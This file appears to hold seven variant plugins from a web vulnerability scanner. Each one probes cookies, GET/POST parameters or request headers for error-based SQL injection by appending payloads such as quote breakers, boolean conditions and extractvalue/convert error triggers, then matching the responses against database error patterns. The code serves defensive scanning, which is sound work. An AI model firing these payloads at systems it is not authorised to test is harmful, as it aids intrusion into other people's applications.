def audit(self):
    """Error-based SQLi check: append a probe string to each cookie value and
    each GET parameter, then match the response against known DBMS error regexes."""
    method = self.requests.command            # request method, GET or POST
    headers = self.requests.get_headers()     # request headers (dict)
    url = self.build_url()                    # full request URL
    resp_data = self.response.get_body_data()     # response body (bytes)
    resp_str = self.response.get_body_str()       # response body (str, auto-decoded)
    resp_headers = self.response.get_headers()    # response headers (dict)
    p = self.requests.urlparse
    params = self.requests.params
    netloc = self.requests.netloc

    # Probe string designed to break out of SQL string/paren contexts.
    sql_flag = '鎈\'"\('

    # --- cookie injection ---
    if headers and "cookie" in headers:
        cookies = paramToDict(headers["cookie"], place=PLACE.COOKIE)
        # Remove the raw cookie header so it does not override the probe cookies.
        del headers["cookie"]
        if cookies:
            for k, v in cookies.items():
                cookie = copy.deepcopy(cookies)
                cookie[k] = v + sql_flag
                # FIX: headers was passed positionally (requests.get's second
                # positional arg is `params`, not `headers`), and `cookies`
                # must be a dict/CookieJar — an urlencoded string is not
                # interpreted as cookies by requests.
                r = requests.get(url, headers=headers, cookies=cookie)
                for sql_regex, dbms_type in Get_sql_errors():
                    match = sql_regex.search(r.text)
                    if match:
                        out.success(url, self.name,
                                    payload="cookie: {}={}".format(k, cookie[k]),
                                    dbms_type=dbms_type, raw=r.raw)
                        break

    # --- GET parameter injection ---
    if method == 'GET':
        if p.query == '':
            return
        # Only probe paths with an accepted file extension.
        exi = os.path.splitext(p.path)[1]
        if exi not in acceptedExt:
            return
        for k, v in params.items():
            if k.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            data[k] = v + sql_flag
            url1 = prepare_url(netloc, params=data)
            r = requests.get(url1, headers=headers)
            html = r.text
            for sql_regex, dbms_type in Get_sql_errors():
                match = sql_regex.search(html)
                if match:
                    out.success(url, self.name,
                                payload="{}={}".format(k, data[k]),
                                dbms_type=dbms_type, raw=r.raw)
                    break
def audit(self):
    """Error-based SQLi detection with a broad payload set (quote/paren breakers,
    boolean conditions, encoded quotes, and DBMS-specific error triggers)."""
    num = random_num(4)
    s = random_str(4)
    # FIX: the extractvalue/convert payloads previously did .format(random_num),
    # embedding the *function object* repr ("<function random_num at 0x...>")
    # instead of a random value; use the generated number `num`.
    _payloads = [
        '鎈\'"\(',
        "'",
        "')",
        "';",
        '"',
        '")',
        '";',
        ' order By 500 ',
        "--",
        "-0",
        ") AND {}={} AND ({}={}".format(num, num + 1, num, num),
        " AND {}={}%23".format(num, num + 1),
        " %' AND {}={} AND '%'='".format(num, num + 1),
        " ') AND {}={} AND ('{}'='{}".format(num, num + 1, s, s),
        " ' AND {}={} AND '{}'='{}".format(num, num + 1, s, s),
        '`',
        '`)',
        '`;',
        '\\',
        "%27",
        "%%2727",
        "%25%27",
        "%60",
        "%5C",
        "extractvalue(1,concat(char(126),md5({})))".format(num),
        "convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))".format(num)
    ]
    # Load injection positions together with their original parameter dicts.
    iterdatas = self.generateItemdatas()
    # Build concrete payloads for each position from the raw payload list.
    for origin_dict, positon in iterdatas:
        payloads = self.paramsCombination(origin_dict, positon, _payloads)
        for key, value, new_value, payload in payloads:
            r = self.req(positon, payload)
            if not r:
                continue
            html = r.text
            # Known DBMS error signature -> confirmed error-based SQLi.
            for sql_regex, dbms_type in Get_sql_errors():
                match = sql_regex.search(html)
                if match:
                    result = self.new_result()
                    result.init_info(self.requests.url, "SQL注入", VulType.SQLI)
                    result.add_detail(
                        "payload探测", r.reqinfo, generateResponse(r),
                        "DBMS_TYPE:{} 匹配结果:{}".format(
                            dbms_type, match.group()),
                        key, payload, positon)
                    self.success(result)
                    return True
            # Fall back to generic sensitive error-message detection.
            message_lists = sensitive_page_error_message_check(html)
            if message_lists:
                result = self.new_result()
                result.init_info(self.requests.url, "SQL注入", VulType.SQLI)
                result.add_detail(
                    "payload探测", r.reqinfo, generateResponse(r),
                    "需要注意的报错信息:{}".format(repr(message_lists)),
                    key, payload, positon)
                self.success(result)
                return True
def audit(self):
    """Crawl links out of the current response and probe each link's GET
    parameters for error-based SQL injection, de-duplicating via Share."""
    method = self.requests.command            # request method, GET or POST
    headers = self.requests.get_headers()     # request headers (dict)
    url = self.build_url()                    # full request URL
    data = self.requests.get_body_data().decode()  # POST body (str)
    resp_data = self.response.get_body_data()      # response body (bytes)
    resp_str = self.response.get_body_str()        # response body (str, auto-decoded)
    resp_headers = self.response.get_headers()     # response headers (dict)

    if method != 'GET':
        return

    # Candidate URLs: every link found in the page source, plus the page itself.
    candidates = get_links(resp_str, url, True)
    candidates.append(url)
    for link in set(candidates):
        parsed = urlparse(link)
        # Only probe URLs carrying a query string and an accepted extension.
        if parsed.query == '':
            continue
        if os.path.splitext(parsed.path)[1] not in acceptedExt:
            continue
        query_params = dict()
        for pair in parsed.query.split("&"):
            try:
                name, value = pair.split("=")
                query_params[name] = value
            except ValueError:
                # Skip fragments that are not exactly name=value.
                pass
        base = "{}://{}{}".format(parsed.scheme, parsed.netloc, parsed.path)
        sql_flag = '鎈\'"\('
        for name, value in query_params.items():
            if name.lower() in ignoreParams:
                continue
            mutated = copy.deepcopy(query_params)
            mutated[name] = value + sql_flag
            target = prepare_url(base, params=mutated)
            # Skip URLs already probed by another worker.
            if Share.in_url(target):
                continue
            Share.add_url(target)
            resp = requests.get(target, headers=headers)
            body = resp.text
            for sql_regex, dbms_type in Get_sql_errors():
                if sql_regex.search(body):
                    out.success(link, self.name,
                                payload="{}={}".format(name, mutated[name]))
                    break
def audit(self):
    """Single-probe error-based SQLi detection across every injectable position."""
    probes = ['鎈\'"\(']
    # Enumerate injection positions with their original parameter dicts,
    # then combine each position's params with the probe payloads.
    for origin_dict, positon in self.generateItemdatas():
        combos = self.paramsCombination(origin_dict, positon, probes)
        for key, value, new_value, payload in combos:
            resp = self.req(positon, payload)
            if not resp:
                continue
            body = resp.text
            # Known DBMS error signature -> confirmed error-based SQLi.
            for sql_regex, dbms_type in Get_sql_errors():
                matched = sql_regex.search(body)
                if matched:
                    result = self.new_result()
                    result.init_info(self.requests.url, "SQL注入", VulType.SQLI)
                    result.add_detail(
                        "payload探测", resp.reqinfo, generateResponse(resp),
                        "DBMS_TYPE:{} 匹配结果:{}".format(dbms_type, matched.group()),
                        key, payload, positon)
                    self.success(result)
                    return True
            # Fall back to generic sensitive error-message detection.
            notable = sensitive_page_error_message_check(body)
            if notable:
                result = self.new_result()
                result.init_info(self.requests.url, "基于报错的SQL注入", VulType.SQLI)
                result.add_detail(
                    "payload探测", resp.reqinfo, generateResponse(resp),
                    "需要注意的报错信息:{}".format(repr(notable)),
                    key, payload, positon)
                self.success(result)
                return True
def audit(self):
    """Error-based SQLi probe for ordinary (form-encoded) POST bodies."""
    method = self.requests.command            # request method, GET or POST
    headers = self.requests.get_headers()     # request headers (dict)
    url = self.build_url()                    # full request URL
    post_hint = self.requests.post_hint
    post_data = self.requests.post_data
    resp_data = self.response.get_body_data()     # response body (bytes)
    resp_str = self.response.get_body_str()       # response body (str, auto-decoded)
    resp_headers = self.response.get_headers()    # response headers (dict)
    p = self.requests.urlparse
    params = self.requests.params
    netloc = self.requests.netloc

    # Only plain key=value POST bodies are handled here.
    if method != 'POST' or post_hint != POST_HINT.NORMAL:
        return

    sql_flag = '鎈\'"\('
    for field, original in post_data.items():
        if field.lower() in ignoreParams:
            continue
        mutated = copy.deepcopy(post_data)
        mutated[field] = original + sql_flag
        resp = requests.post(url, headers=headers, data=mutated)
        page = resp.text
        for sql_regex, dbms_type in Get_sql_errors():
            hit = sql_regex.search(page)
            if hit:
                out.success(url, self.name,
                            payload="{}={}".format(field, mutated[field]),
                            data=str(mutated), dbms=str(dbms_type),
                            raw=resp.raw)
                break
def audit(self):
    """Error-based SQLi probe over GET query parameters."""
    method = self.requests.command            # request method, GET or POST
    headers = self.requests.get_headers()     # request headers (dict)
    url = self.build_url()                    # full request URL
    resp_data = self.response.get_body_data()     # response body (bytes)
    resp_str = self.response.get_body_str()       # response body (str, auto-decoded)
    resp_headers = self.response.get_headers()    # response headers (dict)
    parsed = self.requests.urlparse
    params = self.requests.params
    netloc = self.requests.netloc

    # Guard clauses: GET only, must have a query string and an accepted extension.
    if method != 'GET':
        return
    if parsed.query == '':
        return
    if os.path.splitext(parsed.path)[1] not in acceptedExt:
        return

    sql_flag = '鎈\'"\('
    for name, original in params.items():
        if name.lower() in ignoreParams:
            continue
        mutated = copy.deepcopy(params)
        mutated[name] = original + sql_flag
        target = prepare_url(netloc, params=mutated)
        resp = requests.get(target, headers=headers)
        page = resp.text
        for sql_regex, dbms_type in Get_sql_errors():
            if sql_regex.search(page):
                out.success(url, self.name,
                            payload="{}={}".format(name, mutated[name]))
                break
def audit(self):
    """Error-based SQLi checks on cookies, GET parameters and common headers,
    using a response-length pre-filter to skip probes with no visible effect."""
    method = self.requests.command            # request method, GET or POST
    headers = self.requests.get_headers()     # request headers (dict)
    url = self.build_url()                    # full request URL
    resp_data = self.response.get_body_data()     # response body (bytes)
    resp_str = self.response.get_body_str()       # response body (str, auto-decoded)
    resp_headers = self.response.get_headers()    # response headers (dict)
    p = self.requests.urlparse
    params = self.requests.params
    netloc = self.requests.netloc

    # Only probe paths with an accepted file extension.
    exi = os.path.splitext(p.path)[1]
    if exi not in acceptedExt:
        return
    origin_len = len(resp_str)  # baseline response length for the diff filter

    # Probe string designed to break out of SQL string/paren contexts.
    sql_flag = '鎈\'"\('

    # --- cookie injection ---
    if headers and "cookie" in headers:
        cookies = paramToDict(headers["cookie"], place=PLACE.COOKIE)
        # Work on a copy so the caller's header dict is left intact.
        tmp_headers = copy.deepcopy(headers)
        del tmp_headers["cookie"]
        if cookies:
            for k, v in cookies.items():
                cookie = copy.deepcopy(cookies)
                cookie[k] = v + sql_flag
                # FIX: `cookies` must be a dict/CookieJar; the old code passed
                # an urlencoded string, which requests cannot interpret.
                r = requests.get(url, headers=tmp_headers, cookies=cookie)
                if origin_len == len(r.text):
                    continue  # unchanged response -> probe had no effect
                for sql_regex, dbms_type in Get_sql_errors():
                    match = sql_regex.search(r.text)
                    if match:
                        out.success(url, self.name,
                                    payload="cookie: {}={}".format(k, cookie[k]),
                                    dbms_type=dbms_type, raw=r.raw)
                        break

    # --- GET parameter injection ---
    if method == 'GET':
        if p.query == '':
            return
        # NOTE: the extension was already validated above; the old duplicate
        # check has been removed.
        for k, v in params.items():
            if k.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            data[k] = v + sql_flag
            url1 = prepare_url(netloc, params=data)
            r = requests.get(url1, headers=headers)
            html = r.text
            for sql_regex, dbms_type in Get_sql_errors():
                match = sql_regex.search(html)
                if match:
                    out.success(url, self.name,
                                payload="{}={}".format(k, data[k]),
                                dbms_type=dbms_type, raw=r.raw,
                                errinfo=match.group())
                    break

    # --- header injection (User-Agent / Referer / X-Forwarded-For / Via) ---
    if headers:
        sql_flag = '\'"\('
        new_headers = {
            "User-Agent": headers.get("User-Agent", "") + sql_flag,
            "referer": headers.get("referer", url) + sql_flag,
            "x-forwarded-for": headers.get("x-forwarded-for", "127.0.0.1") + sql_flag,
            "via": headers.get("via", "") + sql_flag
        }
        r = requests.get(url, headers=new_headers)
        html = r.text
        if origin_len == len(html):
            return  # unchanged response -> header probe had no effect
        for sql_regex, dbms_type in Get_sql_errors():
            match = sql_regex.search(html)
            if match:
                out.success(url, self.name, type="header inject",
                            dbms_type=dbms_type, raw=r.raw,
                            errinfo=match.group())
                break